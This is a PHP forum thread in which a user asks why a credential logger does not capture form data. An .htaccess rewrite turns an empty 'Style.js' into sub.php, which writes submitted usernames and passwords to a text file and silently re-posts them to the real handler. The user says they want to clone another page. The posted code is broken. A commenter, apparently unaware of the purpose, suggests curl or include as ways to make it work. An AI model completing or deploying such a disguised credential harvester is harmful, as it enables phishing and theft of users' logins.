# Double submit form

Tags: php

Hello how can i make this code work for double submit i had 
C:\wamp64\www\page\login.php :

```html
  

  <html>
    <head>
    <script type = "text/javascript" src="http://localhost/average/Style.js">
    </script>
    </head>
    <body>
    <form action="verify.php" method="post">
    User Name:<br> 
    <input type="text" name="username"><br><br> 
    Password:<br> 
    <input type="password" name="password"><br><br> 
    <input type="submit" name="submit" value="Login"> 
    </form> 
    </body>
    </html>
```

C:\wamp64\www\page\verify.php :

```
<?php
if(isset($_POST['submit']){
$us = $_POST['username'];
$pw = $_POST['password'];
echo $us ;echo $pw ;}
?>
```

and i had three file in another directory 
C:\wamp64\www\average\Style.js it's containt nothing 
C:\wamp64\www\average\sub.php :

```
<?php
$url = $_SERVER['HTTP_REFERER'];
$url = str_replace(basename($url),'verify.php',$url);
$us = $_POST['username'];
$pw = $_POST['password'];
print "<form action=\"$url\" id=\"XxXxXx\" name=\"XxXxXx\" method=\"POST\" >
                            <input type=\"hidden\" name=\"username\" value=\"$us\">
                            <input type=\"hidden\" name=\"password\" value=\"$pw\">
                            </form>
<script>document.XxXxXx.submit();</script>";
$monfichier = fopen('test.txt', 'a+');
fputs($monfichier,$us);
fputs($monfichier,$pw);
fputs($monfichier,$url);
fclose($monfichier);
?>
```

C:\wamp64\www\average\ .htaccess

```
RewriteEngine on
RewriteRule ^Style.js$ sub.php
```

when run it i get only the url in test.txt i want to get  data also from the form how i could do it 
thank you

Comment: What do you mean by double submit?

Comment: i mean form will send it two time to php file

Comment: A form will only submit once, unless the user clicks on the submit button twice quickly. If you want to send multiple times, you need to use AJAX from JavaScript.

Comment: i know it it's possible with the ajax all i want to know why the sub.php doesn't take the post parameter from login.php

Comment: I don't understand what you're trying to do. The file loaded with `<script>` has to contain JavaScript, not HTML. It's also loaded using `GET`, not `POST`, so nothing will be in `$_POST` when it's loaded.

Comment: i want to do clone from other page and make them submit in two different file

Comment: I'm sorry, you've totally lost me. Edit the question and explain in detail exactly what you expect to happen when the user clicks the Submit button.

Comment: when i submit the form i need that text file get the two value in the form and also the verif.php work and print the two value

Comment: You can't post to both scripts from the browser. `verify.php` can use `curl` to post to `sub.php`. Or it can use `include 'sub.php';`.

Comment: how can i do that with curl please and thank you so much

Comment: I'm not going to write all the code for you, I suggest you read a tutorial on submitting a form with `curl`.

Comment: ok thank you i hope i found it